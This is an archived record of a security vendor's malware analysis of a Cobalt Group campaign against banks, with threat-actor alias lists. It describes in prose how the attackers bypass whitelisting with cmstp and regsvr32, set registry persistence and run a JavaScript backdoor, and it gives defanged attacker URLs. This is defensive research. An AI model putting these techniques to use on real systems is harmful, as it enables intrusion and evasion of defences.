{ "id": "a22a0770-dd0d-4e5e-8bb6-dd4e044da524", "created_at": "2026-04-06T00:21:40.778177Z", "updated_at": "2026-04-10T13:11:46.935407Z", "deleted_at": null, "sha1_hash": "dbd5ff3e11a32a611fc64efc4e3378585c9536fa", "title": "Cobalt Group 2.0", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3372380, "plain_text": "Cobalt Group 2.0\r\nBy Michael Gorelik\r\nArchived: 2026-04-05 12:49:48 UTC\r\nOver the past year, Morphisec and several other endpoint protection companies have been tracking a resurgence in\r\nactivity from the Cobalt Group. Cobalt is one of the most notorious cybercrime operations, with attacks against\r\nmore than 100 banks across 40 countries attributed to the group. The most recent attacks can be grouped into two\r\ntypes of campaigns. Many of the campaigns are based on the known and prevalent ThreadKit exploit kit\r\ngeneration framework. Other campaigns are more sophisticated, borrowing only some functionality from\r\nThreadKit builder while incorporating additional advanced techniques from other sources.\r\nMorphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in\r\nMarch of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery\r\nmethod, borrowing some of the network infrastructures used by both APT28  (aka Fancy Bear) and MuddyWater.\r\nOne of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript\r\nbackdoor, was investigated and presented by the Talos research team. Morphisec has investigated different\r\nsamples from the same campaign. The following analysis presents our findings, focusing on the additional\r\nsophistication patterns and attribution patterns.\r\nCobalt Group Technical Details\r\nStage 1 – Word Macro + Whitelisting Bypass\r\nAs with many other campaigns, the victim received a document with malicious macro visual basic code.\r\nAlthough the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting\r\nfrom the Frame1_Layout function – this method is used much less frequently than the obvious Document_Open\r\nor the AutoOpen.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 1 of 11\n\nThe list of additional possible execution triggers is defined here: https://www.greyhathacker.net/?p=948\r\nThe macro is executing the legitimate Windows process cmstp.exe (connection manager Profile Installer). This\r\ntechnique was previously used by the MuddyWater group when attacking Middle East targets. The use of\r\ncmstp.exe whitelisting bypass was researched by Oddvar Moe, where he showed how, by manipulating the inf file,\r\ncmstp can execute scriptlets or executables.\r\nIn our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the\r\ne-dropbox[.]biz site. This way the group limited the exposure and the delivery of the JavaScript to relevant targets\r\nonly.\r\nStage 2 – JavaScript Dropper + Whitelisting Bypass\r\nThe JavaScript is well encoded with rc4 and some custom modifications:\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 2 of 11\n\nThe decrypted JavaScript has some similar functionality to the ThreadKit builder which is heavily used by the\r\nCobalt Gang 1.0.\r\nAs can be seen from the deobfuscated code, the JavaScript yet again bypasses whitelisting by manipulation of\r\nregsvr32.exe, another legitimate Windows process. The two dropped artifacts – a payload DLL and a Word\r\ndocument – are written to the “Users\u003cLog on User\u003e” folder (the document will replace the opened malicious\r\ndocument with clean stub after killing the running Word process).\r\nStage 3 – PureBasic Legitimate Executable Mixed with Additional Malicious Functions\r\nThe dropped DLL is actually a PureBasic compiled code and a legitimate application. The application is not\r\nsigned (as many other PureBasic applications) and therefore easily manipulated to execute inserted malicious\r\ncode. In this case, the exported function DllRegisterServer wasn’t part of the legitimate application and is perfect\r\nfor application flow redirection when executed by regsvr32.exe. Because PureBasic is a full programming\r\nlanguage that compiles to assembly and has endless possibilities and APIs to manipulate the memory, it also\r\ncomplicates the generation of patterns by security vendors that base their detection on static or dynamic pattern\r\nsignatures. Although some security solutions will block all PureBasic programs (wrong move – there are plenty of\r\nlegitimate PureBasic programs in use today), it’s a smart move made by the attacker group.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 3 of 11\n\nTo function properly, the malicious injected code needs to reflectively load and map to existing core functions.\r\nThe same code also applies anti-disassembly and anti-debugging techniques. It gets the following functions from\r\nKernel32 and Advapi32:\r\nThe code then uses the identified functions to add persistency through registry and add next stages file names\r\nidentifier through the following locations:\r\nHKCUEnvironmentUserInitMprLogonScript – next stage command (JavaScript downloader executed\r\nthrough regsvr32) is registered under UserInitMprLogonScript.\r\nHKCUSoftwareMicrosoftNotepad\u003c$UserName$\u003e – The code creates a new value under Notepad Key\r\nwith a pair representing randomly generated key pair. The right side of the pair is the name of the\r\nJavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be\r\ndownloaded as part of stage 5.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 4 of 11\n\nSuch a combination of registry manipulation was reported a year ago as part of an attack campaign executed by\r\nthe Cobalt Group against Ukrainian banks.\r\nAs part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming\r\ndirectory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript.\r\nStage 4 – JavaScript  Downloader + Whitelisting Bypass\r\nHere, the scriptlet is automatically obfuscated in a way similar to the first scriptlet:\r\nAfter quick deobfuscation, we get to a clear JavaScript that is trying to download the next stage JavaScript\r\nbackdoor using the same regsvr32. Note that the name for the JavaScript is part of the Notepad registry key that\r\nwas written in a previous stage.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 5 of 11\n\nThe script also validates that no one changed the name of the executed file that was randomly given during the\r\nprevious stage. If the name of the executed JavaScript doesn’t match the name registered in the Notepad registry\r\nkey, the script will not execute (researchers sometimes change the names of the files to execute the different stages\r\nseparately – this will not work in this case).\r\nThis decoded JavaScript downloader is almost identical to downloader previously seen around one year ago –\r\nhttps://twitter.com/ItsReallyNick/status/914894320766943232. \r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 6 of 11\n\nStage 5 – JavaScript Backdoor\r\nThe last stage JavaScript is downloaded from hxxps://server.vestacp[.]kz/robots.txt.\r\nThe JavaScript is obfuscated the same way as in the previous stages. After deobfuscation, we encounter a\r\nbackdoor that was used in attacks against Russian speaking businesses in August 2017. This backdoor protocol of\r\ncommands here is almost identical to the previously described backdoor, aside from some name changes:\r\n“d\u0026exec” – Download an executable or a dll (if it’s a dll, use regsvr32 to execute it)\r\n“more_eggs” – Downloads and replace the existing backdoor script with new script\r\n“gtfo” – Clean traces, remove persistency and stage 4,5 files\r\n“more_onion” – Execute the Backdoor script\r\n“via_x” – execute cmd / shell commands locally\r\nAs with every communication with the C2, the script collects and sends information about the target environment\r\nincluding the stack of security solutions installed on the computer and are part of the following list:\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 7 of 11\n\nArtifacts\r\nhttps://github.com/smgorelik/Meetups/blob/master/09272018_Meetup.7z\r\nConclusion\r\nAs organizations improve their defenses, attackers find new ways to get around them. Threat groups such as\r\nCobalt are increasingly incorporating delivery techniques that allow them to easily bypass whitelisting and\r\nAppLocker policies, and we see more and more attacks using legitimate processes to carry out their malicious\r\nintent.\r\nAlthough some of the decrypted artifacts have been seen in the wild since the beginning of the year (or earlier),\r\nthe attack is still very effective as many security solutions do not detect the artifacts once they are obfuscated and\r\nencrypted. The need for  a different approach to security is greater than ever. Moving Target Defense, as defined\r\nby the DHS and implemented by Morphisec, breaks the assumptions made by the attackers. The Morphisec\r\nPreemptive Cyber Defense Platform natively prevents the attack before it can perform any type of malicious\r\nactivity, no updates needed.\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 8 of 11\n\nOrganizations should expect to see much more coming from all Cobalt Group factions during the next year.\r\nContact one of our security experts to learn how Morphisec protects your business from this and future Cobalt\r\nattacks.\r\nAbout the author\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 9 of 11\n\nMichael Gorelik\r\nChief Technology Officer\r\nMorphisec CTO Michael Gorelik leads the malware research operation and sets technology strategy. He has\r\nextensive experience in the software industry and leading diverse cybersecurity software development projects.\r\nPrior to Morphisec, Michael was VP of R\u0026D at MotionLogic GmbH, and previously served in senior leadership\r\npositions at Deutsche Telekom Labs. Michael has extensive experience as a red teamer, reverse engineer, and\r\ncontributor to the MITRE CVE database. He has worked extensively with the FBI and US Department of\r\nHomeland Security on countering global cybercrime. Michael is a noted speaker, having presented at multiple\r\nindustry conferences, such as SANS, BSides, and RSA. Michael holds Bsc and Msc degrees from the Computer\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 10 of 11\n\nScience department at Ben-Gurion University, focusing on synchronization in different OS architectures. He also\r\njointly holds seven patents in the IT space.\r\nSource: https://blog.morphisec.com/cobalt-gang-2.0\r\nhttps://blog.morphisec.com/cobalt-gang-2.0\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://blog.morphisec.com/cobalt-gang-2.0" ], "report_names": [ "cobalt-gang-2.0" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "220e1e99-97ab-440a-8027-b672c5c5df44", "created_at": "2022-10-25T16:47:55.773407Z", "updated_at": "2026-04-10T02:00:03.649501Z", "deleted_at": null, "main_name": "GOLD KINGSWOOD", "aliases": [ "Cobalt Gang ", "Cobalt Spider " ], "source_name": "Secureworks:GOLD KINGSWOOD", "tools": [ "ATMSpitter", "Buhtrap", "Carbanak", "Cobalt Strike", "CobtInt", "Cyst", "Metasploit", "Meterpreter", "Mimikatz", "SpicyOmelette" ], "source_id": "Secureworks", "reports": null }, { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434900, "ts_updated_at": 1775826706, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.pdf", "text": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.txt", "img": "https://archive.orkl.eu/dbd5ff3e11a32a611fc64efc4e3378585c9536fa.jpg" } }